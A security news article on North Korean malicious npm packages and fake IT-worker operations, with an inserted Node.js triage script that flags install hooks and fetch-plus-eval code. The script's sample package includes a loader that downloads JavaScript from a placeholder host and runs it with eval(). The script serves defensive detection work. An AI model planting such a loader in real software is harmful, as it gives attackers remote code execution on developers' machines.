North Korean Hackers Target Developers with Malicious npm Packages

Aug 30, 2024 Ravie Lakshmanan Cryptocurrency / Malware

Threat actors with ties to North Korea have been observed publishing a set of malicious packages to the npm registry, indicating “coordinated and relentless” efforts to target developers with malware and steal cryptocurrency assets.

The latest wave, which was observed between August 12 and 27, 2024, involved packages named temp-etherscan-api, ethersscan-api, telegram-con, helmet-validate, and qq-console.

“Behaviors in this campaign lead us to believe that qq-console is attributable to the North Korean campaign known as ‘Contagious Interview,’” software supply chain security firm Phylum said.

Contagious Interview refers to an ongoing campaign that seeks to compromise software developers with information-stealing malware as part of a purported job interview process. Targets are tricked into downloading bogus npm packages or fake installers for video conferencing software such as MiroTalk hosted on decoy websites.

The end goal of the attacks is to deploy a Python payload named InvisibleFerret that can exfiltrate sensitive data from cryptocurrency wallet browser extensions and set up persistence on the host using legitimate remote desktop software such as AnyDesk. CrowdStrike is tracking the activity under the moniker Famous Chollima.


The newly observed helmet-validate package adopts a new approach: it embeds a JavaScript file called config.js that fetches JavaScript hosted on a remote domain (“ipcheck[.]cloud”) and executes it directly with the eval() function, so the malicious logic never needs to ship inside the package itself.

“Our investigation revealed that ipcheck[.]cloud resolves to the same IP address (167[.]88[.]36[.]13) that mirotalk[.]net resolved to when it was online,” Phylum said, highlighting potential links between the two sets of attacks.
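The fetch-and-eval pattern described above is easy to triage statically before a package ever runs an install hook. The following Node.js script is an added example, not Phylum's tooling and not code from any of the packages named in this article; it scans an in-memory copy of a package's files for install-time lifecycle hooks and for source files that combine a network call with a dynamic-execution sink (eval, new Function, vm.runIn*Context). The two sample packages and the example.invalid URL inside them are constructed for illustration and are not real indicators.

```javascript
// Added example: static triage of npm package contents for the
// "download remote JavaScript and eval() it" pattern.
// Not affiliated with Phylum or any package named in the article;
// the sample packages below are constructed for illustration.
'use strict';

// Source-level heuristics. Cheap and catches the unobfuscated form;
// a production scanner would additionally walk the AST so that
// string-built calls (e.g. global['ev' + 'al']) are not missed.
const DYNAMIC_EXEC =
  /\beval\s*\(|\bnew\s+Function\s*\(|\bvm\.(runInThisContext|runInNewContext)\s*\(/;
const REMOTE_FETCH =
  /\b(https?\.(get|request)|fetch|axios(\.get)?)\s*\(/;
// npm runs these automatically during `npm install`, so code reached
// from them executes without the developer ever requiring the package.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// files: { 'relative/path': 'contents' }
// returns: [{ file, severity, reason }, ...]
function triagePackage(files) {
  const findings = [];

  const pkgJson = files['package.json'];
  if (pkgJson) {
    const scripts = JSON.parse(pkgJson).scripts || {};
    for (const hook of LIFECYCLE_HOOKS) {
      if (scripts[hook]) {
        findings.push({
          file: 'package.json',
          severity: 'medium',
          reason: `lifecycle hook "${hook}" runs code on install: ${scripts[hook]}`,
        });
      }
    }
  }

  for (const [path, src] of Object.entries(files)) {
    if (!path.endsWith('.js')) continue;
    const hasExec = DYNAMIC_EXEC.test(src);
    const hasFetch = REMOTE_FETCH.test(src);
    if (hasExec && hasFetch) {
      // Network input reaching an execution sink is the remote-loader
      // shape; rate it above either signal on its own.
      findings.push({
        file: path,
        severity: 'high',
        reason: 'fetches data over the network and passes it to a dynamic-execution sink',
      });
    } else if (hasExec) {
      findings.push({
        file: path,
        severity: 'low',
        reason: 'dynamic code execution (eval / new Function / vm)',
      });
    }
  }
  return findings;
}

// Constructed sample: postinstall runs config.js, which downloads a
// script from a placeholder host and eval()s the response body.
const SUSPICIOUS_PACKAGE = {
  'package.json': JSON.stringify({
    name: 'example-validate',
    version: '1.0.0',
    scripts: { postinstall: 'node config.js' },
  }),
  'config.js': [
    "const https = require('https');",
    "https.get('https://example.invalid/payload.js', (res) => {",
    "  let body = '';",
    "  res.on('data', (chunk) => (body += chunk));",
    '  res.on(\'end\', () => eval(body));',
    '});',
  ].join('\n'),
  'index.js': "module.exports = { validate: (h) => typeof h === 'object' };",
};

// Constructed sample: no install hooks, no dynamic execution.
const BENIGN_PACKAGE = {
  'package.json': JSON.stringify({ name: 'plain-lib', version: '2.0.0' }),
  'index.js': 'module.exports = (s) => s.trim();',
};

console.log('suspicious:', triagePackage(SUSPICIOUS_PACKAGE));
console.log('benign:', triagePackage(BENIGN_PACKAGE));
```

To apply this to a real tarball, unpack `npm pack <name>` output into the `files` map and run the triage in CI before the package is allowed into a lockfile; treat any high finding as a block, and review medium findings (install hooks are legitimate for native modules but are also the most common malware entry point).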

The company said it also observed another package called sass-notification, uploaded on August 27, 2024, which shared similarities with previously uncovered npm libraries like call-blockflow. These packages have been attributed to a different North Korean threat group tracked as Moonstone Sleet.

“These attacks are characterized by using obfuscated JavaScript to write and execute batch and PowerShell scripts,” it said. “The scripts download and decrypt a remote payload, execute it as a DLL, and then attempt to clean up all traces of malicious activity, leaving behind a seemingly benign package on the victim’s machine.”

Famous Chollima Poses as IT Workers in U.S. Companies

The disclosure comes as CrowdStrike linked Famous Chollima (formerly BadClone) to insider threat operations that entail infiltrating corporate environments under the pretext of legitimate employment.

“Famous Chollima carried out these operations by obtaining contract or full-time equivalent employment, using falsified or stolen identity documents to bypass background checks,” the company said. “When applying for a job, these malicious insiders submitted a résumé typically listing previous employment with a prominent company as well as additional lesser-known companies and no employment gaps.”


While these attacks are primarily financially motivated, a subset of the incidents are said to have involved the exfiltration of sensitive information. CrowdStrike said it has identified the threat actors applying to or actively working at more than 100 unique companies over the past 12 months, most of which are located in the U.S., Saudi Arabia, France, the Philippines, and Ukraine, among others.

Prominently targeted sectors include technology, fintech, financial services, professional services, retail, transportation, manufacturing, insurance, pharmaceutical, social media, and media companies.

“After obtaining employee-level access to victim networks, the insiders performed minimal tasks related to their job role,” the company further said. “In some cases, the insiders also attempted to exfiltrate data using Git, SharePoint, and OneDrive.”

“Additionally, the insiders installed the following RMM tools: RustDesk, AnyDesk, TinyPilot, VS Code Dev Tunnels, and Google Chrome Remote Desktop. The insiders then leveraged these RMM tools in tandem with company network credentials, which allowed numerous IP addresses to connect to the victim’s system.”
